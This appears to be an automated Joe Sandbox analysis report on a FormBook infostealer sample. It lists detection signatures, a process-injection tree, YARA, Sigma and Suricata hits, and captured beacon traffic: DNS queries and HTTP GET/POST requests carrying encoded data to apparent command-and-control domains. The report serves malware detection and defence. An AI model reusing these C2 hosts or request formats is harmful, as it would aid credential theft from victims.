Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XhAQ0Rk63O.exe

Overview

General Information

Sample name:XhAQ0Rk63O.exe
renamed because original name is a hash value
Original sample name:b365215db2a43106d746921ff99c7a8a6c2fc80965dc1567480a38021366848d.exe
Analysis ID:1550245
MD5:1641128999c6968823ca0d92cb8f0ece
SHA1:eb766aacb3c3ee714f728dcddd4ac02168c1225e
SHA256:b365215db2a43106d746921ff99c7a8a6c2fc80965dc1567480a38021366848d
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • XhAQ0Rk63O.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\XhAQ0Rk63O.exe" MD5: 1641128999C6968823CA0D92CB8F0ECE)
    • svchost.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\XhAQ0Rk63O.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • IislGDEHlLEZDm.exe (PID: 5188 cmdline: "C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • net.exe (PID: 7724 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • firefox.exe (PID: 7960 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1574269815.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.3866219592.0000000002E90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3863689053.0000000002960000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.3866264697.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.1574620078.0000000003A90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", CommandLine: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", ParentImage: C:\Users\user\Desktop\XhAQ0Rk63O.exe, ParentProcessId: 7556, ParentProcessName: XhAQ0Rk63O.exe, ProcessCommandLine: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", ProcessId: 7648, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", CommandLine: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", ParentImage: C:\Users\user\Desktop\XhAQ0Rk63O.exe, ParentProcessId: 7556, ParentProcessName: XhAQ0Rk63O.exe, ProcessCommandLine: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", ProcessId: 7648, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-06T15:59:25.999363+010020229301A Network Trojan was detected4.245.163.56443192.168.2.849706TCP
                2024-11-06T16:00:03.959754+010020229301A Network Trojan was detected4.245.163.56443192.168.2.849712TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: XhAQ0Rk63O.exeReversingLabs: Detection: 75%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1574269815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3866219592.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3863689053.0000000002960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3866264697.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1574620078.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1575222037.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3871219369.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: XhAQ0Rk63O.exeJoe Sandbox ML: detected
                Source: XhAQ0Rk63O.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000002.00000003.1542553129.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1542599146.000000000363B000.00000004.00000020.00020000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000003.1652356035.0000000000B00000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IislGDEHlLEZDm.exe, 00000003.00000002.3863687071.000000000018E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: XhAQ0Rk63O.exe, 00000000.00000003.1419274394.0000000004890000.00000004.00001000.00020000.00000000.sdmp, XhAQ0Rk63O.exe, 00000000.00000003.1423114263.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1452027710.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453866402.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871197453.000000000355E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871197453.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.1574242672.000000000306C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1581774696.0000000003212000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: XhAQ0Rk63O.exe, 00000000.00000003.1419274394.0000000004890000.00000004.00001000.00020000.00000000.sdmp, XhAQ0Rk63O.exe, 00000000.00000003.1423114263.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1452027710.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453866402.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 00000004.00000002.3871197453.000000000355E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871197453.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.1574242672.000000000306C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1581774696.0000000003212000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.000000000437C000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3866320365.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.1869973892.00000000038FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.000000000437C000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3866320365.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.1869973892.00000000038FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000002.00000003.1542553129.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1542599146.000000000363B000.00000004.00000020.00020000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000003.1652356035.0000000000B00000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0297C820 FindFirstFileW,FindNextFileW,FindClose,4_2_0297C820
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then xor eax, eax4_2_02969D30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then mov ebx, 00000004h4_2_032004E8

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.066bet.xyz
                Source: Joe Sandbox ViewIP Address: 128.65.195.180 128.65.195.180
                Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49706
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49712
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
                Source: global trafficHTTP traffic detected: GET /yjfe/?A60d=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYp294ngYYiGslw49G10KSSL4+0zLG2YUwGZkJDIt8ktcvA==&QftlZ=CnaPg8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.corpseflowerwatch.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gnvu/?A60d=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FhnX66OqoqX9RpA5jutgMYieahfkhQyed5OXn1sKSNeZ5Og==&QftlZ=CnaPg8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.4nk.educationUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ym43/?A60d=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRRotDS7tV9/yFnz3DJaYsKbhs+4gmff4HURwuAtNrFLN6oA==&QftlZ=CnaPg8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.migraine-massages.proUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /d26j/?A60d=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN3m5Pan90DEVx2dAgRBkFBhEuf5ZPCqUAEh8OTzHmZFBqDA==&QftlZ=CnaPg8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.vnxoso88.artUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /afcr/?QftlZ=CnaPg8j&A60d=pxUnB3/JQIgHT0Xru4WA6nCBQFxpXJgMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8ACfrzzZPLOA7u6erlXN+FNsi+iqdwi1J/UOdsVhZq9rVpg== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.pluribiz.lifeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1iqa/?A60d=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQhWC34rDkgUmQuOVrwdU4dvabP7OAcppow6eveUPberj5Ig==&QftlZ=CnaPg8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kdtzhb.topUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /293d/?QftlZ=CnaPg8j&A60d=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGRb4J0orjC0OEaNIQeyVbD4LqlGxYuRKPk3SC/Id1jS91tA== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.evoo.websiteUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /vdvc/?A60d=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczReOZAYqscKe8aXj18ECqhEbYKMceViC9DOJ/t3u5W+eFfLA==&QftlZ=CnaPg8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.astorg-group.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0m8a/?A60d=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp7faj8lfUqZu5U5j35YEbCksI5bqMK6zFCmtbYf508vfTQ==&QftlZ=CnaPg8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fiqsth.vipUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ezyn/?A60d=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMLO8/BWEb4M0fVL3Jy75+c2YHHmj0ZqdnbhQxCwgxfTHy3A==&QftlZ=CnaPg8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.bio-thymus.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /9ezc/?QftlZ=CnaPg8j&A60d=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+Pd9/3gTJl/Aqae97oJsSOpJi/Ea/U3//DCXx5U5lNSou+g== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.wukong.collegeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /95c0/?A60d=0qxxa8sZzaTQGsV+IlYRUJribMqFDMjNP0hPtjDvBTL1oNFysxcHk25mntsLFh1aL6dJocQb44ZX+yLzRXP4WstlnU8yga+uYMkloLbvjpkOD6D/HpsAt4GJWXyRqysedQ==&QftlZ=CnaPg8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.vehiculargustav.clickUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /fjsq/?A60d=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSZEPIXc/cFilHIaBazWG3FiJEFNWk2bg6JB0HDDUtnLYhkw==&QftlZ=CnaPg8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.yushaliu.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ucmb/?QftlZ=CnaPg8j&A60d=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLyg6sZMK+n6SnxPYLsSNnFHqgmG+z3/fMKl0erdP4+1Q9hQ== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.marketprediction.appUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /yjfe/?A60d=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYp294ngYYiGslw49G10KSSL4+0zLG2YUwGZkJDIt8ktcvA==&QftlZ=CnaPg8j HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.corpseflowerwatch.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.corpseflowerwatch.org
                Source: global trafficDNS traffic detected: DNS query: www.4nk.education
                Source: global trafficDNS traffic detected: DNS query: www.migraine-massages.pro
                Source: global trafficDNS traffic detected: DNS query: www.vnxoso88.art
                Source: global trafficDNS traffic detected: DNS query: www.pluribiz.life
                Source: global trafficDNS traffic detected: DNS query: www.kdtzhb.top
                Source: global trafficDNS traffic detected: DNS query: www.evoo.website
                Source: global trafficDNS traffic detected: DNS query: www.astorg-group.info
                Source: global trafficDNS traffic detected: DNS query: www.fiqsth.vip
                Source: global trafficDNS traffic detected: DNS query: www.bio-thymus.com
                Source: global trafficDNS traffic detected: DNS query: www.wukong.college
                Source: global trafficDNS traffic detected: DNS query: www.vehiculargustav.click
                Source: global trafficDNS traffic detected: DNS query: www.bulls777.pro
                Source: global trafficDNS traffic detected: DNS query: www.yushaliu.online
                Source: global trafficDNS traffic detected: DNS query: www.marketprediction.app
                Source: global trafficDNS traffic detected: DNS query: www.066bet.xyz
                Source: unknownHTTP traffic detected: POST /gnvu/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 205Cache-Control: max-age=0Connection: closeHost: www.4nk.educationOrigin: http://www.4nk.educationReferer: http://www.4nk.education/gnvu/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36Data Raw: 41 36 30 64 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 58 6d 4b 4d 34 43 6f 32 4d 6f 4c 42 4e 72 4a 77 6a 70 30 63 44 6d 35 39 72 4e 4b 48 4b 71 4d 54 55 50 67 6f 4b 51 3d Data Ascii: A60d=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTXmKM4Co2MoLBNrJwjp0cDm59rNKHKqMTUPgoKQ=
